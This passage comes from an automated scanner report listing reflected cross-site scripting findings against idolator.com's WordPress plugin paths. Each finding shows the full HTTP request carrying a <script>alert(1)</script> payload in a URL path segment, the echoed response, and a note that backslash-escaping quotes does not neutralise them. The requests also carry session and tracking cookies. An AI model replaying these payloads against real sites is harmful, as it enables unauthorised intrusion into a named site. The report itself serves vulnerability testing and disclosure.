Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35924
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contente61a3\"><script>alert(1)</script>de04ee79223/plugins/wp-polls/polls-js.js?ver=2.50" />
...[SNIP]...

4.159. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8040"><script>alert(1)</script>684a5586fea was submitted in the REST URL parameter 2. This input was echoed as d8040\"><script>alert(1)</script>684a5586fea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsd8040"><script>alert(1)</script>684a5586fea/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:13 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35924
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/pluginsd8040\"><script>alert(1)</script>684a5586fea/wp-polls/polls-js.js?ver=2.50" />
...[SNIP]...

4.160. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd48"><script>alert(1)</script>d9a2b5b9c97 was submitted in the REST URL parameter 3. This input was echoed as afd48\"><script>alert(1)</script>d9a2b5b9c97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-pollsafd48"><script>alert(1)</script>d9a2b5b9c97/polls-js.js?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:26 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35924
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-pollsafd48\"><script>alert(1)</script>d9a2b5b9c97/polls-js.js?ver=2.50" />
...[SNIP]...

4.161. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 945b8"><script>alert(1)</script>d485dfaae3 was submitted in the REST URL parameter 4. This input was echoed as 945b8\"><script>alert(1)</script>d485dfaae3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-js.js945b8"><script>alert(1)</script>d485dfaae3?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:37 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35921
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-polls/polls-js.js945b8\"><script>alert(1)</script>d485dfaae3?ver=2.50" />
...[SNIP]...

4.162. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcf7c"><script>alert(1)</script>c9f57ca000c was submitted in the REST URL parameter 1. This input was echoed as dcf7c\"><script>alert(1)</script>c9f57ca000c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentdcf7c"><script>alert(1)</script>c9f57ca000c/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:02 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contentdcf7c\"><script>alert(1)</script>c9f57ca000c/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.163. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24d4e"><script>alert(1)</script>827c3f95aec was submitted in the REST URL parameter 2. This input was echoed as 24d4e\"><script>alert(1)</script>827c3f95aec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins24d4e"><script>alert(1)</script>827c3f95aec/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:13 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins24d4e\"><script>alert(1)</script>827c3f95aec/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.164. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea543"><script>alert(1)</script>b7d35424d0 was submitted in the REST URL parameter 3. This input was echoed as ea543\"><script>alert(1)</script>b7d35424d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-playerea543"><script>alert(1)</script>b7d35424d0/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:24 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36023
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-playerea543\"><script>alert(1)</script>b7d35424d0/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.165. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e990"><script>alert(1)</script>c4efd4a2e08 was submitted in the REST URL parameter 4. This input was echoed as 6e990\"><script>alert(1)</script>c4efd4a2e08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm26e990"><script>alert(1)</script>c4efd4a2e08/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:34 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm26e990\"><script>alert(1)</script>c4efd4a2e08/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.166. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 5 (the fifth path segment, the file name soundmanager2-nodebug-jsmin.js) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aff7"><script>alert(1)</script>ab71aec3e75 was submitted in REST URL parameter 5 and was echoed as 5aff7\"><script>alert(1)</script>ab71aec3e75 in the application's response. As in the other findings against this host, the quote is backslash-escaped (\") instead of HTML-encoded, which does not stop it from closing the attribute, so the <script> element that follows is rendered as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js5aff7"><script>alert(1)</script>ab71aec3e75?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:46 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js5aff7\"><script>alert(1)</script>ab71aec3e75?ver=2.8.6" />
...[SNIP]...

4.167. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 1 (the first path segment, wp-content) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e2c"><script>alert(1)</script>c4da70b726 was submitted in REST URL parameter 1 and was echoed as 84e2c\"><script>alert(1)</script>c4da70b726 in the application's response. The quote is backslash-escaped (\") rather than HTML-encoded; a backslash is not an escape character in an HTML attribute, so the attribute is still closed and the <script> element that follows is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content84e2c"><script>alert(1)</script>c4da70b726/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:34:41 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35954
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content84e2c\"><script>alert(1)</script>c4da70b726/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf" />
...[SNIP]...

4.168. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 2 (the second path segment, plugins) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ac6"><script>alert(1)</script>32f84736faa was submitted in REST URL parameter 2 and was echoed as b4ac6\"><script>alert(1)</script>32f84736faa in the application's response. As in the other findings against this host, the quote is backslash-escaped (\") instead of HTML-encoded, which does not stop it from closing the attribute, so the <script> element that follows is rendered as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsb4ac6"><script>alert(1)</script>32f84736faa/wpaudio-mp3-player/sm2/soundmanager2.swf HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:34:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:34:52 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/pluginsb4ac6\"><script>alert(1)</script>32f84736faa/wpaudio-mp3-player/sm2/soundmanager2.swf" />
...[SNIP]...

4.169. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 3 (the third path segment, wpaudio-mp3-player) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e7e"><script>alert(1)</script>971d8cdf90b was submitted in REST URL parameter 3 and was echoed as 62e7e\"><script>alert(1)</script>971d8cdf90b in the application's response. The quote is backslash-escaped (\") rather than HTML-encoded; a backslash is not an escape character in an HTML attribute, so the attribute is still closed and the <script> element that follows is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player62e7e"><script>alert(1)</script>971d8cdf90b/sm2/soundmanager2.swf HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:35:03 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player62e7e\"><script>alert(1)</script>971d8cdf90b/sm2/soundmanager2.swf" />
...[SNIP]...

4.170. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 4 (the fourth path segment, sm2) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa4a5"><script>alert(1)</script>b8140d6ede4 was submitted in REST URL parameter 4 and was echoed as fa4a5\"><script>alert(1)</script>b8140d6ede4 in the application's response. As in the other findings against this host, the quote is backslash-escaped (\") instead of HTML-encoded, which does not stop it from closing the attribute, so the <script> element that follows is rendered as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm2fa4a5"><script>alert(1)</script>b8140d6ede4/soundmanager2.swf HTTP/1.1
Host: idolator.com
